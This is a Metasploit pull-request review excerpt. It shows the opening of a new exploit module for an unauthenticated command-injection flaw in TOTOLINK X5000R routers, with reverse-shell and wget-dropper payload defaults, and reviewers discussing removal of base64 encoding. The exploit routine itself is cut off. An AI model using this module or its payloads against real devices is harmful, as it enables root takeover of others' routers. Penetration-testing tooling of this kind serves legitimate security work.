modules/exploits/linux/http/totolink_x5000r_unauth_rce_cve_2023_30013.rb

```diff
@@ -0,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TOTOLINK X500R unauthenticated remote command execution vulnerability.',
+        'Description' => %q{
+          TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability
+          in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through
+          the "command" parameter.
+          After exploitation, an attacker will have full access with the same user privileges under
+          which the the webserver is running (typically as user `root`, ;-).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Kazamayc https://github.com/Kazamayc', # Discovery of the vulnerability
+        ],
+        'References' => [
+          ['CVE', '2023-30013'],
+          ['URL', 'https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013']
+        ],
+        'DisclosureDate' => '2023-05-05',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPSLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPSLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'printf', 'echo', 'bourne'],
+              'Linemax' => 65535,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Encode payload with base64 and generate random number
```

Comment:
I don't think this comment is needed :)

Reply:
Yeah, will remove it...

Reply:
Removed the comment, but also the `base64` encoding logic.
Some vulnerable routers do not have `base64` installed. Plain payload works fine, so removed the dependency on `base64`. See https://github.com/rapid7/metasploit-framework/pull/18365/commits/784f3118f0c9e7dd35956efe62fc9482e3be68c3.